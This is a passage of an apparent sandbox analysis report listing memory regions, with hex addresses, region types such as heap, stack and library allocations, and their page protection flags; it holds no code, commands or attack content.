page read and write
|
||
|
1C8C0000
|
heap
|
page read and write
|
||
|
3B7D000
|
trusted library allocation
|
page read and write
|
||
|
4CE000
|
heap
|
page read and write
|
||
|
387B000
|
trusted library allocation
|
page read and write
|
||
|
2BFF000
|
heap
|
page read and write
|
||
|
3264000
|
trusted library allocation
|
page read and write
|
||
|
34D000
|
stack
|
page read and write
|
||
|
326B000
|
trusted library allocation
|
page read and write
|
||
|
12744000
|
trusted library allocation
|
page read and write
|
||
|
1A784000
|
heap
|
page execute and read and write
|
||
|
326D000
|
trusted library allocation
|
page read and write
|
||
|
387B000
|
trusted library allocation
|
page read and write
|
||
|
3B72000
|
trusted library allocation
|
page read and write
|
||
|
3265000
|
trusted library allocation
|
page read and write
|
||
|
463000
|
heap
|
page read and write
|
||
|
3EF000
|
heap
|
page read and write
|
||
|
387B000
|
trusted library allocation
|
page read and write
|
||
|
1B4C4000
|
heap
|
page read and write
|
||
|
39CE000
|
heap
|
page read and write
|
||
|
710000
|
heap
|
page read and write
|
||
|
3A67000
|
heap
|
page read and write
|
||
|
122B1000
|
trusted library allocation
|
page read and write
|
||
|
1D00000
|
direct allocation
|
page read and write
|
||
|
4F6000
|
heap
|
page read and write
|
||
|
1ACD8000
|
heap
|
page read and write
|
||
|
483C000
|
heap
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
4826000
|
heap
|
page read and write
|
||
|
7FE89CA4000
|
trusted library allocation
|
page read and write
|
||
|
3A79000
|
heap
|
page read and write
|
||
|
2BBC000
|
heap
|
page read and write
|
||
|
486F000
|
heap
|
page read and write
|
||
|
1C690000
|
heap
|
page read and write
|
||
|
243000
|
trusted library allocation
|
page read and write
|
||
|
3B72000
|
trusted library allocation
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
3A77000
|
heap
|
page read and write
|
||
|
4821000
|
heap
|
page read and write
|
||
|
2ED000
|
heap
|
page read and write
|
||
|
12956000
|
trusted library allocation
|
page read and write
|
||
|
3A6A000
|
heap
|
page read and write
|
||
|
1E76000
|
heap
|
page read and write
|
||
|
2E7000
|
heap
|
page read and write
|
||
|
122C1000
|
trusted library allocation
|
page read and write
|
||
|
1AC000
|
stack
|
page read and write
|
||
|
1C470000
|
heap
|
page read and write
|
||
|
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
|
49F000
|
heap
|
page read and write
|
||
|
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
|
4802000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
237E000
|
stack
|
page read and write
|
||
|
5940000
|
heap
|
page read and write
|
||
|
396000
|
heap
|
page read and write
|
||
|
43DE000
|
stack
|
page read and write
|
||
|
2FD3000
|
trusted library allocation
|
page read and write
|
||
|
487E000
|
heap
|
page read and write
|
||
|
2C13000
|
heap
|
page read and write
|
||
|
710000
|
heap
|
page read and write
|
||
|
2100000
|
heap
|
page read and write
|
||
|
1DA0000
|
direct allocation
|
page read and write
|
||
|
7A0000
|
heap
|
page read and write
|
||
|
3B7D000
|
trusted library allocation
|
page read and write
|
||
|
399C000
|
heap
|
page read and write
|
||
|
481E000
|
heap
|
page read and write
|
||
|
3BE000
|
heap
|
page read and write
|
||
|
568000
|
heap
|
page read and write
|
||
|
3A72000
|
heap
|
page read and write
|
||
|
46E000
|
heap
|
page read and write
|
||
|
C30000
|
unkown
|
page readonly
|
||
|
817000
|
heap
|
page read and write
|
||
|
313D000
|
trusted library allocation
|
page read and write
|
||
|
1C236000
|
heap
|
page read and write
|
||
|
1B14E000
|
stack
|
page read and write
|
||
|
493000
|
heap
|
page read and write
|
||
|
5A14000
|
heap
|
page read and write
|
||
|
3135000
|
trusted library allocation
|
page read and write
|
||
|
488D000
|
heap
|
page read and write
|
||
|
326000
|
heap
|
page read and write
|
||
|
3B7D000
|
trusted library allocation
|
page read and write
|
||
|
3240000
|
trusted library allocation
|
page read and write
|
||
|
7FFFFF80000
|
trusted library allocation
|
page readonly
|
||
|
7FE89C35000
|
trusted library allocation
|
page read and write
|
||
|
2C13000
|
heap
|
page read and write
|
||
|
5F0000
|
direct allocation
|
page read and write
|
||
|
336000
|
heap
|
page read and write
|
||
|
230C000
|
stack
|
page read and write
|
||
|
7FE89A20000
|
trusted library allocation
|
page execute and read and write
|
||
|
3DE000
|
heap
|
page read and write
|
||
|
1AD25000
|
heap
|
page read and write
|
||
|
4BF000
|
heap
|
page read and write
|
||
|
B90000
|
heap
|
page execute and read and write
|
||
|
7FE89962000
|
trusted library allocation
|
page read and write
|
||
|
2BEC000
|
heap
|
page read and write
|
||
|
47A000
|
heap
|
page read and write
|
||
|
3137000
|
trusted library allocation
|
page read and write
|
||
|
2C0000
|
heap
|
page read and write
|
||
|
5D4000
|
heap
|
page read and write
|
||
|
4804000
|
heap
|
page read and write
|
||
|
7FE89AE0000
|
trusted library allocation
|
page read and write
|
||
|
23FF000
|
stack
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
|
1AD2B000
|
heap
|
page read and write
|
||
|
482F000
|
heap
|
page read and write
|
||
|
3B5000
|
heap
|
page read and write
|
||
|
210000
|
trusted library allocation
|
page read and write
|
||
|
7FE89CD8000
|
trusted library allocation
|
page read and write
|
||
|
4A63000
|
heap
|
page read and write
|
||
|
2C2C000
|
heap
|
page read and write
|
||
|
3B72000
|
trusted library allocation
|
page read and write
|
||
|
2D0000
|
heap
|
page read and write
|
||
|
2C92000
|
heap
|
page read and write
|
||
|
7FE89B60000
|
trusted library allocation
|
page execute and read and write
|
||
|
4815000
|
heap
|
page read and write
|
||
|
4802000
|
heap
|
page read and write
|
||
|
3A48000
|
heap
|
page read and write
|
||
|
313D000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
|
148000
|
heap
|
page read and write
|
||
|
1ACE0000
|
heap
|
page read and write
|
||
|
1ED000
|
stack
|
page read and write
|
||
|
2521000
|
trusted library allocation
|
page read and write
|
||
|
51E000
|
heap
|
page read and write
|
||
|
1B00000
|
trusted library allocation
|
page read and write
|
||
|
2CA3000
|
heap
|
page read and write
|
||
|
4828000
|
heap
|
page read and write
|
||
|
5A7E000
|
heap
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
714000
|
heap
|
page read and write
|
||
|
3A22000
|
heap
|
page read and write
|
||
|
4DC0000
|
trusted library allocation
|
page read and write
|
||
|
B60000
|
heap
|
page execute and read and write
|
||
|
2C15000
|
heap
|
page read and write
|
||
|
3A6D000
|
heap
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
1B000000
|
heap
|
page read and write
|
||
|
1C970000
|
heap
|
page read and write
|
||
|
498000
|
heap
|
page read and write
|
||
|
3A7B000
|
heap
|
page read and write
|
||
|
7FE89B48000
|
trusted library allocation
|
page read and write
|
||
|
2BF4000
|
heap
|
page read and write
|
||
|
690000
|
direct allocation
|
page read and write
|
||
|
391000
|
heap
|
page read and write
|
||
|
1BFBE000
|
stack
|
page read and write
|
||
|
3A6000
|
heap
|
page read and write
|
||
|
1A630000
|
trusted library section
|
page read and write
|
||
|
482C000
|
heap
|
page read and write
|
||
|
399C000
|
heap
|
page read and write
|
||
|
7FE89A26000
|
trusted library allocation
|
page read and write
|
||
|
2A01000
|
trusted library allocation
|
page read and write
|
||
|
348000
|
heap
|
page read and write
|
||
|
483D000
|
heap
|
page read and write
|
||
|
3A5B000
|
heap
|
page read and write
|
||
|
39A9000
|
heap
|
page read and write
|
||
|
3A0000
|
heap
|
page read and write
|
||
|
650000
|
heap
|
page execute and read and write
|
||
|
3B7D000
|
trusted library allocation
|
page read and write
|
||
|
387B000
|
trusted library allocation
|
page read and write
|
||
|
3A5D000
|
heap
|
page read and write
|
||
|
591000
|
heap
|
page read and write
|
||
|
3A5E000
|
heap
|
page read and write
|
||
|
40B000
|
heap
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
7FE89960000
|
trusted library allocation
|
page read and write
|
||
|
387B000
|
trusted library allocation
|
page read and write
|
||
|
1A5BA000
|
stack
|
page read and write
|
||
|
465000
|
heap
|
page read and write
|
||
|
3B7D000
|
trusted library allocation
|
page read and write
|
||
|
1AC29000
|
stack
|
page read and write
|
||
|
41A000
|
heap
|
page read and write
|
||
|
670000
|
heap
|
page read and write
|
||
|
4818000
|
heap
|
page read and write
|
||
|
478000
|
remote allocation
|
page execute and read and write
|
||
|
3B7D000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
|
42C000
|
heap
|
page read and write
|
||
|
1C4ED000
|
heap
|
page read and write
|
||
|
7FE89B26000
|
trusted library allocation
|
page read and write
|
||
|
2CA1000
|
heap
|
page read and write
|
||
|
4BD000
|
heap
|
page read and write
|
||
|
39A9000
|
heap
|
page read and write
|
||
|
3A63000
|
heap
|
page read and write
|
||
|
29D7000
|
trusted library allocation
|
page read and write
|
||
|
4A7000
|
heap
|
page read and write
|
||
|
31FC000
|
stack
|
page read and write
|
||
|
7FE8994D000
|
trusted library allocation
|
page execute and read and write
|
||
|
3B7D000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
|
582000
|
heap
|
page read and write
|
||
|
47D5000
|
heap
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AFC000
|
trusted library allocation
|
page read and write
|
||
|
1A609000
|
stack
|
page read and write
|
||
|
4FD000
|
heap
|
page read and write
|
||
|
7FE89B22000
|
trusted library allocation
|
page read and write
|
||
|
1C45B000
|
heap
|
page read and write
|
||
|
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
|
2BE4000
|
heap
|
page read and write
|
||
|
3EF0000
|
trusted library allocation
|
page read and write
|
||
|
3139000
|
trusted library allocation
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
2360000
|
heap
|
page read and write
|
||
|
398E000
|
stack
|
page read and write
|
||
|
1AD88000
|
heap
|
page read and write
|
||
|
1C461000
|
heap
|
page read and write
|
||
|
4802000
|
heap
|
page read and write
|
||
|
4846000
|
heap
|
page read and write
|
||
|
325A000
|
trusted library allocation
|
page read and write
|
||
|
44B000
|
heap
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
5079000
|
heap
|
page read and write
|
||
|
442000
|
heap
|
page read and write
|
||
|
484A000
|
heap
|
page read and write
|
||
|
2BEF000
|
heap
|
page read and write
|
||
|
4A66000
|
heap
|
page read and write
|
||
|
4A9000
|
heap
|
page read and write
|
||
|
39CD000
|
heap
|
page read and write
|
||
|
4A2A000
|
heap
|
page read and write
|
||
|
5B7000
|
direct allocation
|
page read and write
|
||
|
342000
|
heap
|
page read and write
|
||
|
4833000
|
heap
|
page read and write
|
||
|
482C000
|
heap
|
page read and write
|
||
|
2C22000
|
heap
|
page read and write
|
||
|
409B000
|
stack
|
page read and write
|
||
|
1AAD8000
|
heap
|
page read and write
|
||
|
36C0000
|
trusted library allocation
|
page read and write
|
||
|
130000
|
trusted library allocation
|
page read and write
|
||
|
7FE89C00000
|
trusted library allocation
|
page read and write
|
||
|
1C760000
|
heap
|
page read and write
|
||
|
1C4B0000
|
heap
|
page read and write
|
||
|
7FE89B62000
|
trusted library allocation
|
page read and write
|
||
|
1A7BE000
|
heap
|
page execute and read and write
|
||
|
360000
|
heap
|
page read and write
|
||
|
5B9A000
|
heap
|
page read and write
|
||
|
1A780000
|
heap
|
page execute and read and write
|
||
|
1C45D000
|
heap
|
page read and write
|
||
|
29DE000
|
trusted library allocation
|
page read and write
|
||
|
51C000
|
heap
|
page read and write
|
||
|
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
|
3327000
|
trusted library allocation
|
page read and write
|
||
|
33D000
|
heap
|
page read and write
|
||
|
3B4000
|
heap
|
page read and write
|
||
|
88F000
|
heap
|
page read and write
|
||
|
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
|
1AD14000
|
heap
|
page read and write
|
||
|
3800000
|
trusted library allocation
|
page read and write
|
||
|
3B72000
|
trusted library allocation
|
page read and write
|
||
|
4833000
|
heap
|
page read and write
|
||
|
7FE899FC000
|
trusted library allocation
|
page execute and read and write
|
||
|
4861000
|
heap
|
page read and write
|
||
|
7FE89AFC000
|
trusted library allocation
|
page read and write
|
||
|
2C29000
|
heap
|
page read and write
|
||
|
1ACFD000
|
heap
|
page read and write
|
||
|
29FA000
|
trusted library allocation
|
page read and write
|
||
|
482E000
|
heap
|
page read and write
|
||
|
7FE89A20000
|
trusted library allocation
|
page read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
12536000
|
trusted library allocation
|
page read and write
|
||
|
26000
|
heap
|
page read and write
|
||
|
460000
|
heap
|
page read and write
|
||
|
4833000
|
heap
|
page read and write
|
||
|
478000
|
remote allocation
|
page execute and read and write
|
||
|
202000
|
stack
|
page read and write
|
||
|
363000
|
heap
|
page read and write
|
||
|
486E000
|
heap
|
page read and write
|
||
|
3058000
|
trusted library allocation
|
page read and write
|
||
|
2BFF000
|
heap
|
page read and write
|
||
|
391000
|
heap
|
page read and write
|
||
|
4818000
|
heap
|
page read and write
|
||
|
1C3A0000
|
heap
|
page read and write
|
||
|
4870000
|
heap
|
page read and write
|
||
|
1A93D000
|
stack
|
page read and write
|
||
|
3A5B000
|
heap
|
page read and write
|
||
|
59D9000
|
heap
|
page read and write
|
||
|
1DD4000
|
heap
|
page read and write
|
||
|
3CC000
|
heap
|
page read and write
|
||
|
7FE89C70000
|
trusted library allocation
|
page read and write
|
||
|
48BF000
|
heap
|
page read and write
|
||
|
39AF000
|
heap
|
page read and write
|
||
|
474000
|
remote allocation
|
page execute and read and write
|
||
|
37F0000
|
trusted library allocation
|
page read and write
|
||
|
387B000
|
trusted library allocation
|
page read and write
|
||
|
7FE89950000
|
trusted library allocation
|
page read and write
|
||
|
443000
|
trusted library allocation
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
4821000
|
heap
|
page read and write
|
||
|
3DA000
|
heap
|
page read and write
|
||
|
2D0000
|
trusted library allocation
|
page read and write
|
||
|
519000
|
heap
|
page read and write
|
||
|
30EF000
|
stack
|
page read and write
|
||
|
7FE8998D000
|
trusted library allocation
|
page execute and read and write
|
||
|
3A67000
|
heap
|
page read and write
|
||
|
7FE89CB0000
|
trusted library allocation
|
page read and write
|
||
|
3B72000
|
trusted library allocation
|
page read and write
|
||
|
2A0A000
|
trusted library allocation
|
page read and write
|
||
|
7FE89C70000
|
trusted library allocation
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
7FE89B10000
|
trusted library allocation
|
page execute and read and write
|
||
|
21E0000
|
heap
|
page execute and read and write
|
||
|
3AB000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
383000
|
heap
|
page read and write
|
||
|
2C07000
|
heap
|
page read and write
|
||
|
7FE89953000
|
trusted library allocation
|
page read and write
|
||
|
3142000
|
trusted library allocation
|
page read and write
|
||
|
4828000
|
heap
|
page read and write
|
||
|
6B0000
|
heap
|
page read and write
|
||
|
3A5B000
|
heap
|
page read and write
|
||
|
4BC1000
|
heap
|
page read and write
|
||
|
7FE89BD0000
|
trusted library allocation
|
page read and write
|
||
|
1A8A8000
|
stack
|
page read and write
|
||
|
387B000
|
trusted library allocation
|
page read and write
|
||
|
470000
|
heap
|
page read and write
|
||
|
1B320000
|
heap
|
page read and write
|
||
|
487E000
|
heap
|
page read and write
|
||
|
218F000
|
stack
|
page read and write
|
||
|
4A64000
|
heap
|
page read and write
|
||
|
7FE89C30000
|
trusted library allocation
|
page read and write
|
||
|
7FE89C20000
|
trusted library allocation
|
page read and write
|
||
|
2C22000
|
heap
|
page read and write
|
||
|
482A000
|
heap
|
page read and write
|
||
|
1ACD0000
|
heap
|
page read and write
|
||
|
483C000
|
heap
|
page read and write
|
||
|
12548000
|
trusted library allocation
|
page read and write
|
||
|
1C544000
|
heap
|
page read and write
|
||
|
1C3BB000
|
heap
|
page read and write
|
||
|
5EE000
|
stack
|
page read and write
|
||
|
4A32000
|
heap
|
page read and write
|
||
|
1C4D1000
|
heap
|
page read and write
|
||
|
7FE89A00000
|
trusted library allocation
|
page execute and read and write
|
||
|
3A65000
|
heap
|
page read and write
|
||
|
482A000
|
heap
|
page read and write
|
||
|
3B7D000
|
trusted library allocation
|
page read and write
|
||
|
3A4F000
|
heap
|
page read and write
|
||
|
29F8000
|
trusted library allocation
|
page read and write
|
||
|
3B7D000
|
trusted library allocation
|
page read and write
|
||
|
40B000
|
heap
|
page read and write
|
||
|
3A5B000
|
heap
|
page read and write
|
||
|
33C000
|
heap
|
page read and write
|
||
|
C3C000
|
unkown
|
page readonly
|
||
|
38F000
|
direct allocation
|
page read and write
|
||
|
4865000
|
heap
|
page read and write
|
||
|
482C000
|
heap
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
1AEDF000
|
stack
|
page read and write
|
||
|
3B7D000
|
trusted library allocation
|
page read and write
|
||
|
1C3F9000
|
heap
|
page read and write
|
||
|
39A9000
|
heap
|
page read and write
|
||
|
39AD000
|
heap
|
page read and write
|
||
|
4831000
|
heap
|
page read and write
|
||
|
2EC9000
|
heap
|
page read and write
|
||
|
29D9000
|
trusted library allocation
|
page read and write
|
||
|
1B4DC000
|
stack
|
page read and write
|
||
|
40B000
|
heap
|
page read and write
|
||
|
469000
|
heap
|
page read and write
|
||
|
29DB000
|
trusted library allocation
|
page read and write
|
||
|
5AE9000
|
heap
|
page read and write
|
||
|
2BFF000
|
heap
|
page read and write
|
||
|
1D90000
|
heap
|
page read and write
|
||
|
870000
|
heap
|
page read and write
|
||
|
1DC6000
|
heap
|
page read and write
|
||
|
3A5B000
|
heap
|
page read and write
|
||
|
55A000
|
heap
|
page read and write
|
||
|
7FE89990000
|
trusted library allocation
|
page read and write
|
||
|
482C000
|
heap
|
page read and write
|
||
|
2C13000
|
heap
|
page read and write
|
||
|
2AA000
|
heap
|
page read and write
|
||
|
4D9000
|
heap
|
page read and write
|
||
|
3BC000
|
heap
|
page read and write
|
||
|
7FE89CA0000
|
trusted library allocation
|
page read and write
|
||
|
591000
|
heap
|
page read and write
|
||
|
1D40000
|
direct allocation
|
page read and write
|
||
|
412000
|
heap
|
page read and write
|
||
|
12401000
|
trusted library allocation
|
page read and write
|
||
|
4C33000
|
heap
|
page read and write
|
||
|
47DE000
|
heap
|
page read and write
|
||
|
1C85D000
|
stack
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
4828000
|
heap
|
page read and write
|
||
|
2C07000
|
heap
|
page read and write
|
||
|
5CB000
|
direct allocation
|
page read and write
|
||
|
5075000
|
heap
|
page read and write
|
||
|
38D000
|
direct allocation
|
page read and write
|
||
|
4811000
|
heap
|
page read and write
|
||
|
284B000
|
heap
|
page read and write
|
||
|
36E0000
|
trusted library allocation
|
page execute
|
||
|
10000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
1A96E000
|
stack
|
page read and write
|
||
|
7FFFFF82000
|
trusted library allocation
|
page readonly
|
||
|
4819000
|
heap
|
page read and write
|
||
|
7FE89970000
|
trusted library allocation
|
page read and write
|
||
|
429000
|
heap
|
page read and write
|
||
|
1F50000
|
heap
|
page read and write
|
||
|
29D3000
|
trusted library allocation
|
page read and write
|
||
|
2C98000
|
heap
|
page read and write
|
||
|
2A0A000
|
trusted library allocation
|
page read and write
|
||
|
37F0000
|
trusted library allocation
|
page read and write
|
||
|
47D1000
|
heap
|
page read and write
|
||
|
7FE89988000
|
trusted library allocation
|
page read and write
|
||
|
7FE89C10000
|
trusted library allocation
|
page read and write
|
||
|
389000
|
heap
|
page read and write
|
||
|
3290000
|
heap
|
page read and write
|
||
|
257D000
|
trusted library allocation
|
page read and write
|
||
|
3810000
|
trusted library allocation
|
page read and write
|
||
|
3D6000
|
heap
|
page read and write
|
||
|
1A7A0000
|
heap
|
page execute and read and write
|
||
|
78F000
|
stack
|
page read and write
|
||
|
482E000
|
heap
|
page read and write
|
||
|
4802000
|
heap
|
page read and write
|
||
|
4831000
|
heap
|
page read and write
|
||
|
2C2B000
|
heap
|
page read and write
|
||
|
4863000
|
heap
|
page read and write
|
||
|
1B50000
|
heap
|
page read and write
|
||
|
344E000
|
stack
|
page read and write
|
||
|
3A65000
|
heap
|
page read and write
|
||
|
3142000
|
trusted library allocation
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
7FE89C60000
|
trusted library allocation
|
page read and write
|
||
|
1ACEE000
|
heap
|
page read and write
|
||
|
4812000
|
heap
|
page read and write
|
||
|
3EC0000
|
heap
|
page read and write
|
||
|
35A000
|
heap
|
page read and write
|
||
|
7FE89C49000
|
trusted library allocation
|
page read and write
|
||
|
4811000
|
heap
|
page read and write
|
||
|
7FE899BC000
|
trusted library allocation
|
page execute and read and write
|
||
|
5ADD000
|
heap
|
page read and write
|
||
|
39A9000
|
heap
|
page read and write
|
||
|
5B76000
|
heap
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
1B036000
|
heap
|
page read and write
|
||
|
1B820000
|
heap
|
page read and write
|
||
|
2CAF000
|
heap
|
page read and write
|
||
|
48C4000
|
heap
|
page read and write
|
||
|
86A000
|
heap
|
page read and write
|
||
|
7A4000
|
heap
|
page read and write
|
||
|
2C9C000
|
heap
|
page read and write
|
||
|
1C229000
|
heap
|
page read and write
|
||
|
39A7000
|
heap
|
page read and write
|
||
|
485F000
|
heap
|
page read and write
|
||
|
3BB000
|
heap
|
page read and write
|
||
|
2BB0000
|
heap
|
page read and write
|
||
|
2A02000
|
trusted library allocation
|
page read and write
|
||
|
51D000
|
heap
|
page read and write
|
||
|
3B7D000
|
trusted library allocation
|
page read and write
|
||
|
280000
|
heap
|
page read and write
|
||
|
15C000
|
heap
|
page read and write
|
||
|
360000
|
heap
|
page read and write
|
||
|
4863000
|
heap
|
page read and write
|
||
|
48BB000
|
heap
|
page read and write
|
||
|
2EC0000
|
heap
|
page read and write
|
||
|
1C1BE000
|
stack
|
page read and write
|
||
|
1B55C000
|
stack
|
page read and write
|
||
|
3B72000
|
trusted library allocation
|
page read and write
|
||
|
7FFFFF85000
|
trusted library allocation
|
page execute read
|
||
|
3B10000
|
heap
|
page read and write
|
||
|
2C92000
|
heap
|
page read and write
|
||
|
1D3000
|
heap
|
page read and write
|
||
|
45F0000
|
heap
|
page read and write
|
||
|
4CC9000
|
heap
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
484F000
|
heap
|
page read and write
|
||
|
426000
|
heap
|
page read and write
|
||
|
1B94F000
|
stack
|
page read and write
|
||
|
4815000
|
heap
|
page read and write
|
||
|
32A3000
|
heap
|
page read and write
|
||
|
7FE89A60000
|
trusted library allocation
|
page execute and read and write
|
||
|
240000
|
trusted library allocation
|
page read and write
|
||
|
49D0000
|
heap
|
page read and write
|
||
|
5B5F000
|
heap
|
page read and write
|
||
|
3A60000
|
heap
|
page read and write
|
||
|
47FE000
|
heap
|
page read and write
|
||
|
426000
|
heap
|
page read and write
|
||
|
7FE89A1C000
|
trusted library allocation
|
page execute and read and write
|
||
|
29DF000
|
trusted library allocation
|
page read and write
|
||
|
1C7FF000
|
stack
|
page read and write
|
||
|
7FE89C40000
|
trusted library allocation
|
page read and write
|
||
|
380000
|
heap
|
page read and write
|
||
|
3A77000
|
heap
|
page read and write
|
||
|
4B8000
|
heap
|
page read and write
|
||
|
1D70000
|
heap
|
page read and write
|
||
|
12531000
|
trusted library allocation
|
page read and write
|
||
|
35E000
|
heap
|
page read and write
|
||
|
1252F000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
2DAA000
|
stack
|
page read and write
|
||
|
3810000
|
trusted library allocation
|
page read and write
|
||
|
3A75000
|
heap
|
page read and write
|
||
|
7FE899F0000
|
trusted library allocation
|
page read and write
|
||
|
2DDF000
|
trusted library allocation
|
page read and write
|
||
|
1B3A0000
|
heap
|
page read and write
|
There are 1632 hidden memdumps, click here to show them.